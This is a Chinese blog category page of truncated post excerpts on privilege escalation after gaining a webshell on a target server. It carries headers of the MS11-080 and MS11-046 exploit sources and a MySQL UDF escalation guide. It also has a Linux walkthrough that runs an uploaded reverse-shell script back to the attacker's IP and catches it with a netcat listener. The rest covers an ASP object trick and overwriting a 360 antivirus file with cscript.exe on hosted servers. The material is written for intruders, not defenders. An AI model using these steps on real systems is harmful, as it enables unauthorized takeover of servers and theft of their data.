随笔分类 -  提权

MS11-080
摘要:/** MS11-080 Afd.sys Privilege Escalation Exploit* 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/* 改编:KiDebug,Google@pku.edu.cn* 编译:VC6.0* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell*/#include <stdio.h>#include <Winsock2.h>#include <windows.h>#include < 阅读全文

posted @ 2011-12-06 11:16 0xcc 阅读(1243) 评论(0) 推荐(0)

MS11-046
摘要:/** 触发MS11-046* 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html* 改编:KiDebug,Google@pku.edu.cn* 编译:VC6.0* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell*/#include <stdio.h>#include <Winsock2.h>#include <windows.h>#include <lm.h>#pragma comm 阅读全文

posted @ 2011-12-06 11:16 0xcc 阅读(573) 评论(0) 推荐(0)

关于udf提权
摘要:一、功能:利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。 第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.. 阅读全文

posted @ 2011-11-19 10:10 0xcc 阅读(385) 评论(0) 推荐(0)

linux溢出提权
摘要:先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid=529(zeicom)还不是root权限,输入uname –r 返回:2.6.18-164.11.1.el5PAE找对应的exp, 这里地址整理很齐全可以这里下 http://bbs.tian6.com/linux 阅读全文

posted @ 2011-11-13 02:40 0xcc 阅读(858) 评论(0) 推荐(0)

无wscript.shell组件提权
摘要:代码:<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if 阅读全文

posted @ 2011-11-13 02:39 0xcc 阅读(394) 评论(0) 推荐(0)

星外提权
摘要:星外提权方法打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 阅读全文

posted @ 2011-11-13 02:25 0xcc 阅读(2292) 评论(0) 推荐(0)

导航